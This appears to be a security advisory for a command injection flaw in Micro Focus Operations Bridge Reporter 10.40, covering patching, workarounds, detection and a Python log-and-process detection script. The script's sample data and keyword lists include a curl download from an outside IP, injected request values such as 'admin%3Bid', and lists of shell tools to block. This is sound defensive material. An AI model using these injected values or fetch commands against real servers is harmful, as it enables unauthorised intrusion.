CVE-2021-22502

9.8 CRITICAL

📋 TL;DR

CVE-2021-22502 is an unauthenticated command injection vulnerability in Micro Focus Operations Bridge Reporter (OBR) version 10.40. A remote attacker who can reach the OBR web interface can execute arbitrary commands on the server without any credentials, which in practice gives the attacker control of the host at the privilege level of the OBR service.

💻 Affected Systems

Products:
  • Micro Focus Operation Bridge Reporter
Versions: 10.40
Operating Systems: Windows, Linux
Default Config Vulnerable: ⚠️ Yes
Notes: All OBR 10.40 installations are affected regardless of configuration. The flaw is in the web interface component, so any host on which that interface is reachable is exposed.

📦 What is this software?

Micro Focus Operations Bridge Reporter (OBR, formerly HP Service Health Reporter) is the historical reporting component of the Operations Bridge suite. It collects performance and availability data from monitoring sources into its own database and publishes reports through a web interface, which is the component affected here.

⚠️ Risk & Real-World Impact

🔴 Worst Case: Complete compromise of the OBR server leading to data theft, lateral movement within the network, ransomware deployment, or persistent backdoor installation.

🟠 Likely Case: Attackers gain shell access to the OBR server, allowing them to steal sensitive monitoring data, install cryptocurrency miners, or use the server as a pivot point for further attacks.

🟢 If Mitigated: Limited impact, where network segmentation, prompt patching, and host-level controls prevent command execution or confine what a compromised service account can reach.

🌐 Internet-Facing: HIGH - The vulnerability is unauthenticated and publicly exploitable, making internet-facing instances immediate targets for automated attacks.
🏢 Internal Only: HIGH - Even internally, the unauthenticated nature makes it easily exploitable by any internal threat actor or compromised system.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Multiple public exploit scripts are available, including on Packet Storm Security. The vulnerability requires no authentication and minimal technical skill to exploit.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 10.40 Update 1 or later

Vendor Advisory: https://softwaresupport.softwaregrp.com/doc/KM03775947

Restart Required: Yes

Instructions:

1. Download the patch from the Micro Focus Support Portal (see the vendor advisory above).
2. Back up your OBR installation before changing anything.
3. Apply the patch following the Micro Focus instructions.
4. Restart the OBR service.
5. Verify the patch is applied: the reported version should be 10.40 Update 1 or later.

🔧 Temporary Workarounds

Network Isolation (all platforms)

Restrict network access to the OBR web interface to trusted administrative networks only; an interface that can be driven without credentials must not be reachable from the internet.

Use firewall rules to block external access to the OBR web ports (commonly listed as 8080 and 8443, but confirm the ports your installation actually binds before writing the rules).

Web Application Firewall (all platforms)

Deploy a WAF with command injection protection rules in front of the OBR web interface.

Configure the WAF to block requests whose parameters contain shell metacharacters (; | & ` $( ) or suspicious tool names (curl, wget, /bin/sh, cmd.exe, powershell), including their URL-encoded forms.

Treat the WAF as a compensating control only: it stops commodity scanners and the public PoCs as written, but pattern filters can be evaded by encoding and rewording, so it does not replace the patch.

🧯 If You Can't Patch

  • Immediately isolate the OBR server from internet access and restrict internal access to only the administrative networks that need it
  • Implement strict network monitoring and alerting for any suspicious commands or processes originating from the OBR server
  • Since working exploits are public, treat an OBR 10.40 host that has been reachable while unpatched as possibly already compromised, and review it for unexpected processes, accounts and outbound connections before trusting it

🔍 How to Verify

Check if Vulnerable:

Any OBR 10.40 installation without 10.40 Update 1 (or later) is vulnerable. Confirm the version from the web interface's version information or from the installation directory.

Check Version:

On Windows: look under HKLM\SOFTWARE\Micro Focus\OBR in the registry for the version value. On Linux: look for a version file in the OBR installation directory (for example /opt/OBR/version.txt if OBR was installed under /opt/OBR; the path depends on the directory chosen at install time).

Verify Fix Applied:

Verify the version shows 10.40 Update 1 or later. If you also test exploitability, do so only against systems you are authorized to test, with a harmless command (for example one that creates a marker file) rather than anything destructive, and confirm that the command no longer executes.

📡 Detection & Monitoring

Log Indicators:

  • Shells, interpreters or download tools (sh, bash, cmd.exe, powershell, curl, wget) launched as children of the OBR web-service (Java) process
  • Unusual command execution in system or audit logs on the OBR host
  • Web access logs showing shell metacharacters (; | & ` $( ) or tool names in request parameters, including URL-encoded forms

Network Indicators:

  • Unusual outbound connections from OBR server
  • Traffic to known malicious IPs or domains
  • Unexpected port scans originating from OBR server

SIEM Query:

Splunk-style template; replace the source and field names with those of your process-creation feed (Sysmon, auditd or EDR), and pair it with a second search over the web access logs for ; | & ` $( in request parameters:

source="OBR_logs" OR sourcetype="*process*" parent_process="*java*" (process="*/bin/sh*" OR process="*bash*" OR process="*cmd.exe*" OR process="*powershell*" OR process="*curl*" OR process="*wget*")
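A concrete form of the log and process indicators above, added here as an example rather than taken from the advisory or from any vendor tooling. It assumes a Sysmon/EDR-style process-event schema (ParentImage, ParentCommandLine, Image, CommandLine, User), combined-format web access logs, and that the OBR web tier is a Java process whose command line names the install location; the sample events, paths and URL endpoints are constructed and are not OBR's real ones. The metacharacter pattern it uses is the same one a WAF rule for the workaround above would carry.

```python
"""Detection helpers for post-exploitation of CVE-2021-22502 on an OBR host.

Added example (not vendor code). Two checks:
  1. process_tree_alerts(): flag shells, interpreters and download tools
     spawned by the OBR web-application (Java) process.
  2. web_log_alerts(): flag requests whose URL carries shell metacharacters
     after URL decoding (also catches double-encoded payloads).
Field names follow a generic Sysmon/EDR-style schema; the sample events and
paths below are constructed for this example and are not OBR's real ones.
"""
import re
from urllib.parse import unquote_plus

# Children the OBR web process should never launch (assumption: tune to the
# helper binaries the legitimate service actually starts on your hosts).
SUSPICIOUS_CHILDREN = {
    "sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh",
    "nc", "ncat", "curl", "wget", "python", "python3", "perl", "certutil.exe",
}

# Metacharacters and tool names that have no place in a login or report
# parameter. A WAF rule for the workaround would carry the same pattern.
INJECTION = re.compile(
    r"[;|`&]|\$\(|\$\{|/bin/(ba)?sh\b|\bcmd\.exe|\bpowershell\b|\b(wget|curl|nc|ncat)\b",
    re.IGNORECASE,
)

# Combined log format: ip ident user [ts] "METHOD path proto" status size
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_obr_web_process(image: str, cmdline: str) -> bool:
    """Assumption: the OBR web tier is a Java process whose command line
    names the OBR install location (here 'obr' or 'pmdb'). Adjust to match."""
    return _basename(image) in {"java", "java.exe"} and bool(
        re.search(r"\b(obr|pmdb)\b", cmdline, re.IGNORECASE)
    )


def process_tree_alerts(events):
    """events: dicts with ParentImage, ParentCommandLine, Image, CommandLine, User."""
    alerts = []
    for ev in events:
        if is_obr_web_process(ev["ParentImage"], ev["ParentCommandLine"]) and \
                _basename(ev["Image"]) in SUSPICIOUS_CHILDREN:
            alerts.append(f"{ev['User']}: {ev['ParentImage']} spawned {ev['CommandLine']}")
    return alerts


def web_log_alerts(lines):
    """Return (client_ip, raw_path, matched_token) for each suspicious request."""
    alerts = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if not m:
            continue
        # Decode twice so %2524 -> %24 -> $ is caught as well as single encoding.
        decoded = unquote_plus(unquote_plus(m["path"]))
        hit = INJECTION.search(decoded)
        if hit:
            alerts.append((m["ip"], m["path"], hit.group(0)))
    return alerts


# --- constructed sample data (not real OBR logs; paths are illustrative) ---
OBR_JAVA = "/opt/obr/jre/bin/java"
OBR_CMD = "/opt/obr/jre/bin/java -Dobr.home=/opt/obr org.apache.catalina.startup.Bootstrap start"
PROCESS_EVENTS = [
    {"ParentImage": OBR_JAVA, "ParentCommandLine": OBR_CMD, "Image": "/bin/sh",
     "CommandLine": "sh -c id", "User": "obr"},
    {"ParentImage": OBR_JAVA, "ParentCommandLine": OBR_CMD, "Image": "/usr/bin/curl",
     "CommandLine": "curl http://198.51.100.7/x.sh", "User": "obr"},
    {"ParentImage": OBR_JAVA, "ParentCommandLine": OBR_CMD, "Image": "/opt/obr/bin/reportgen",
     "CommandLine": "reportgen --daily", "User": "obr"},        # legitimate helper
    {"ParentImage": "/usr/sbin/cron", "ParentCommandLine": "cron", "Image": "/bin/sh",
     "CommandLine": "sh -c /etc/cron.daily/logrotate", "User": "root"},  # not under OBR
]
ACCESS_LOG = [
    '203.0.113.5 - - [10/Feb/2021:12:00:01 +0000] "GET /app/login HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Feb/2021:12:00:02 +0000] "POST /app/login?user=admin%3Bid HTTP/1.1" 500 0',
    '198.51.100.9 - - [10/Feb/2021:12:00:03 +0000] "GET /app/login?user=a%2524%2528id%2529 HTTP/1.1" 500 0',
    '10.0.0.4 - - [10/Feb/2021:12:00:04 +0000] "GET /app/report?name=Monthly+CPU+Summary HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for a in process_tree_alerts(PROCESS_EVENTS):
        print("PROC ", a)
    for ip, path, token in web_log_alerts(ACCESS_LOG):
        print("WEB  ", ip, path, "->", repr(token))
```

Run against the constructed data, the process check raises two alerts (the shell and the curl download spawned by the Java process) and ignores both the legitimate helper and the cron-spawned shell; the web check flags the single-encoded `;` and the double-encoded `$(` and passes the benign report request. The parent-process filter is what keeps this usable: matching on shell names alone fires on every cron job on the host.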
